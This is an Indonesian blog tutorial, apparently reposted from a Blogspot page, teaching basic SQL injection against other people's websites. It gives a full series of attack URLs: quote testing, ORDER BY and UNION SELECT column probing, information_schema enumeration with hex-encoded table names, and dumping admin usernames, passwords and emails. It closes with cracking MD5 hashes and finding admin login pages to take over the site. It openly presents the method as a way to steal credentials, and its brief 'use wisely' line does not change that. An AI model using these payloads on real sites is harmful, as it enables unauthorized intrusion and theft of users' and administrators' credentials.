Kali ini saya akan share mengenai Dasar SQL Injection, salah satu trik yang paling laris digunakan oleh para hacker Indonesia untuk mencuri username dan password sebuah website.
Ini merupakan Teknik SQL yang sangat mendasar untuk teman-teman pelajari
Kita akan mencoba menginjec website orang lain dengan Teknik ini secara bertahap, dinulai dengan menambahkan tanda petik di akhir URL Target.
Sekarang kita melakukan teknik tanda petik pada akhir URL sebuah artikel pada website target agar mengetahui apakah website tersebut memiliki Vulnerable dengan SQL Injection.
http://target.org/sql.php?inject=20'
http://target.org/sql.php?injection=10 order by 1--
jika tidak ada error pada trick di atas, coba ubah seperti di bawah
http://target.org/sql.php?injection=10 order by 5--
jika cara di atas masih tidak bisa, coba dengan teknik lain seperti di bawah ini :
http://target.org/sql.php?injection=-10 union all select 1--
Atau
http://target.org/sql.php?injection=-10 union all select 1,2--
Atau
http://target.org/sql.php?injection=-10 union all select 1,2,3--
jika belum menemukan hole, lakukan seterusnya sampai Hole di temukan
Mungkin anda mau mencoba trick lain seperti ini
http://target.org/sql.php?injection=10 and 1=2 union all select 1--
Atau
http://target.org/sql.php?injection=10 and 1=2 union all select 1,2--
Dan
http://target.org/sql.php?injection=10 and 1=2 union all select 1,2,3--
Lakukan seterusnya sampe keluar kolom yang bermasalah.
Untuk melanjutkan tutorial ini maka kita anggap saja yang bermasalah pada kolom ke 3…
Jika telah menemukan kolom bermasalahnya, maka kita lanjutkan untuk mencari Versi SQLi nya
Contoh :
http://target.org/sql.php?injection=-10 union all select 1,2,version(),4,5--
atau
Contoh:
http://target.org/sql.php?injection=-10 union all select 1,2,@@version,4,5--
jika seandainya yang keluar versi 4, maka lewatkan saja, karena kita harus menebak table dan kolomNya, walapun sebenarnya bisa jika tebakan kolom dan table kamu benar, nah jika yang keluar versi 5 , silahkan lanjutkan.
Sekarang mari kita mencari Tabel pada website tersebut
http://target.org/sql.php?injection=-10 union all select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=databasae()--
Perhatikan File yang bagian ini:
>>group_concat(table_name)<< == ini untuk mencari Tabel dari database yang ada. >>from information_schema.tables where table_schema=database << == Kita tahu kalau ternyata di letakkan pada angka terakhir.
Nah sekarang table telah kita dapatkan, biasanya seh seperti ini yang tampil:
Admin|user | Forum | Berita | Pooling |
Setelah mendapatkan tabelnya, maka kita harus tahu apa saja yang ada di table tersebut, tapi biasanya table yang ingin di cari harus di Convert dulu menjadi ASCII
Contoh :
http://target.org/sql.php?injection=-10 union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=0x61646D696E--
61646D696E = admin = dari string kita rubah ke ASCII dengan menambahkan 0xASCII
Setelah dapat kolom, maka kita akan melakukan DUMP kolom tersebut, pada kolom yang terdapat pada table biasanya adalah
id
username
password
karena sudah tahu maka selanjutnya kita melakukan DUMPING
Contoh:
http://target.org/sql.php?injection=-10 union all select group_concat(id,0x3a,username,0x3a,password,0x3a,email) from admin--
nah, setelah selesai melakukan Dumping maka username dan password ada di tangan anda, tapi tidak jarang kita menemukan password yang telah di encrypt dengan menggunakan MD5, untuk bisa mengetahui Normal Text nya tinggal Crack saja, banyak tool Crack MD5 Online, misal di www.md5decryption.com (contoh, tapi masih banyak kog), Tanya saja si penyambung lidah Online (google). Jika telah menemukan Normal textnya maka silahkan anda mencari Login Page Admin untuk bisa login sebagai Admin Site target.
Biasanya :
www.target.com/administrator (Joomla)
www.target.com/admin/login.php
www.target.com/admin/login.php
sebenarnya login page admin itu tergantung dari CMS yang site gunakan, tidak jarang CMS nya buatan sendiri, jadi bisa juga anda menggunakan Online Scan Tool untuk mencari Login Page Admin.
nah selesai deh, username n password ada ditangan anda, kalo seandainya password yang kita dapet di encrypt dengan md5 silahkan crack saja yah, banyak kok crack buat md5 yang online tool sekarang, kalau tidak percaya, tanya aja si Penyambung lidah Google.
Demikian Teknik SQL injection dari saya, Gunakan Ilmu dengan Bijak, tidak untuk merusak… karena Membuat tidak semudah mengkritik… jika melakukan pengerusakan website itu baik, maka tidak ada yang mau insaf dari kegiatan itu.
Semoga membantu
Sumber:
Kumpulan Tips Trik Komputer Teknik Dasar SQL Injection
http://touyabanderas.blogspot.com